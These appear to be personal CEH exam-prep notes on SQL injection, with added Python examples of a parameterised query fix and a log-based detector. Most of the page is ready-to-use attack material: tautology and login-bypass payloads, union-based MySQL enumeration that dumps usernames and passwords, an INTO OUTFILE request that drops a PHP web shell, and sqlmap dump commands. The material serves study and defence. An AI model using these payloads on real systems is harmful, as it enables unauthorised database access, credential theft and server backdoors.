Book of Eopi

SQL Injection

Welcome to the SQL Injection module. This note will guide you through all the methodologies I used while preparing for the CEH (Practical) exam.


Last updated 2 years ago

Introduction

SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists, or private customer details.

What is SQL?

SQL stands for Structured Query Language, a computer language for storing, manipulating, and retrieving data held in a relational database. SQL is the standard language for relational database systems, but each vendor ships its own dialect: MS SQL Server uses T-SQL, Oracle uses PL/SQL, the MS Access version of SQL is called JET SQL (its native format), and so on. This matters for injection because the exact syntax of comments, string concatenation and system variables differs between dialects.

Basics

  • You can learn SQL Injection basics from the given link below.

SQL Injection Cheat Sheet

SQLMap

  • sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

  • It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches, from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Once you are comfortable with SQLMap, you should also know about:

Damn Small SQLi Scanner

Basic technique

Stick ' in a parameter and see if it throws a database error (and note what kind).

Another simple test:

' or '1'='1

Other tests:

-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

POST parameters

You can also attempt to inject parameters passed using POST requests, but you'll need Burp or Firefox tamper to view and edit them. For example, you can test a parameter by adding a ' at the end, like lang=en'.

Bypassing authentication

If you find a poorly-sanitized login page, you can attempt to log in without credentials by injecting the username parameter:

username' or 1=1;#
username'-
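The flaw that the quote probe and the login bypass above rely on, shown as an added example that is not part of this note: a login query built by string concatenation next to the same query with bound parameters, run against a constructed SQLite stand-in for the lab's MySQL users table (the table layout and credentials are assumptions).

```python
import sqlite3

# Constructed stand-in for the lab's MySQL "users" table, using SQLite so the
# example runs offline; the injection mechanics are the same.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    # The flaw the page's payloads rely on: user input is spliced into the
    # SQL text, so a quote in the input ends the literal and the rest of the
    # input is parsed as SQL.
    sql = ("SELECT name FROM users WHERE name = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]

def login_hardened(conn, username, password):
    # Parameterised query: the statement text is fixed and the driver binds
    # the values separately, so quotes in the input never change its structure.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]

def quote_probe_errors(login, conn):
    # The page's first test: send a lone ' and watch for a database error.
    # Vulnerable code raises a syntax error; bound parameters just match nothing.
    try:
        login(conn, "'", "")
        return False
    except sqlite3.Error:
        return True

if __name__ == "__main__":
    db = make_db()
    tautology = "' or 'x'='x"   # payload from the page's test list
    print("vulnerable:", login_vulnerable(db, "admin", tautology))  # every user
    print("hardened:  ", login_hardened(db, "admin", tautology))    # nothing
    print("quote probe errors (vulnerable):", quote_probe_errors(login_vulnerable, db))
    print("quote probe errors (hardened):  ", quote_probe_errors(login_hardened, db))
```

The tautology lands in the password literal, so the WHERE clause becomes `(name='admin' AND password='') OR 'x'='x'` and every row comes back; the bound version treats the whole payload as an opaque password value.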

Database enumeration

The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL.

Get version:

http://[host]/inject.php?id=1 union all select 1,2,3,@@version,5

You can get the number of columns through trial and error using order by. For each query, increase the column number until the database throws an unknown column error:

http://[host]/inject.php?id=54 order by 1
http://[host]/inject.php?id=54 order by 2
http://[host]/inject.php?id=54 order by 3

Get the current user:

http://[host]/inject.php?id=1 union all select 1,2,3,user(),5

See all tables:

http://[host]/inject.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables

Get column names for a specified table:

http://[host]/inject.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'

Get usernames and passwords (0x3a means :):

http://[host]/inject.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users

Depending on the database user's privileges (MySQL requires the FILE privilege for this), you may be able to write to files on the server with MySQL's INTO OUTFILE clause and drop a PHP shell in the web root:

http://[host]/inject.php?id=54 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

I suspect you could inject a full reverse shell in there too...
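From the defender's side, the enumeration requests above leave a recognisable trail in web server access logs. Added example, not from this note: a small signature scanner over constructed Apache-style log lines that replay the requests from this section (the signature set, IPs and paths are assumptions), plus one benign request containing the word "order" to show that the patterns respect word boundaries.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the enumeration steps shown on this page. Assumption: a lab
# scope, not a full WAF ruleset; they are meant to be tuned, not dropped in.
SIGNATURES = {
    "column-count probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\.", re.I),
    "version/user fingerprint": re.compile(r"@@version|\buser\(\)", re.I),
    "file write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "tautology": re.compile(r"\bor\s+(?:true\b|'?\w+'?\s*=\s*'?\w+)", re.I),
}

# Access-log line: client IP first, then the quoted request line.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) ')

def classify_request(target):
    """URL-decode a request target and return (path, sorted signature names it trips)."""
    path, _, query = unquote_plus(target).partition("?")
    labels = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    return path, sorted(labels)

def scan_log(text):
    """Return (client_ip, path, labels) for every log line that trips a signature."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path, labels = classify_request(m.group(2))
        if labels:
            hits.append((m.group(1), path, labels))
    return hits

# Constructed sample log (not real traffic) replaying this page's requests
# plus one benign request whose query contains the word "order".
LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /inject.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /inject.php?id=54%20order%20by%203 HTTP/1.1" 500 0
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /inject.php?id=1%20union%20all%20select%201,2,3,@@version,5 HTTP/1.1" 200 600
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /inject.php?id=1%20union%20all%20select%201,2,3,table_name,5%20FROM%20information_schema.tables HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /inject.php?id=54%20union%20all%20select%201,2,3,4,5,6%20into%20OUTFILE%20%27/tmp/out.txt%27 HTTP/1.1" 200 0
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /login.php?username=%27%20or%20%27x%27%3D%27x HTTP/1.1" 302 0
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?q=order+form HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    for ip, path, labels in scan_log(LOG):
        print(ip, path, ", ".join(labels))
```

A 500 response paired with an "order by N" request is the server-side view of the column-count trick: the first N that errors is one past the real column count.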

SQLmap

Assuming you've tested a parameter with ' and it is injectable, run sqlmap against the URL:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbms=mysql

It may not run unless you specify the database type.

Get the databases:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbs --dbms=mysql

Get the tables in a database:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --tables -D [database name]

Get the columns in a table:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --columns -D [database name] -T [table name]

Dump a table:

sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dump -D [database name] -T [table name]

Passing tokens

If the URL isn't accessible, you can pass cookie data or authentication credentials to SQLmap by pasting the post request in a file and using the -r option:

sqlmap -r request.txt

If you just need to pass a cookie:

sqlmap -u "http://[host]/inject.php" --cookie "PHPSESSID=foobar"

REST-style URLs

If your URLs have no parameters, you can still test them:

sqlmap -u "http://[host]/param1*/param2*"

Further reading

Damn Small SQLi Scanner (DSSS) is a fully functional vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.

  • SQL injection
  • Gaining a reverse shell from SQL injection
  • SQL injection cheat sheet
  • Dumping a complete database using SQL injection
  • Hacking node.js and MongoDB
  • SQLmap tutorial
  • SQL Injection
  • What is SQL Injection? Tutorial & Examples | Web Security Academy
  • SQL Injection Cheat Sheet
  • GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool (GitHub repo of SQLMap)
  • GitHub - stamparm/DSSS: Damn Small SQLi Scanner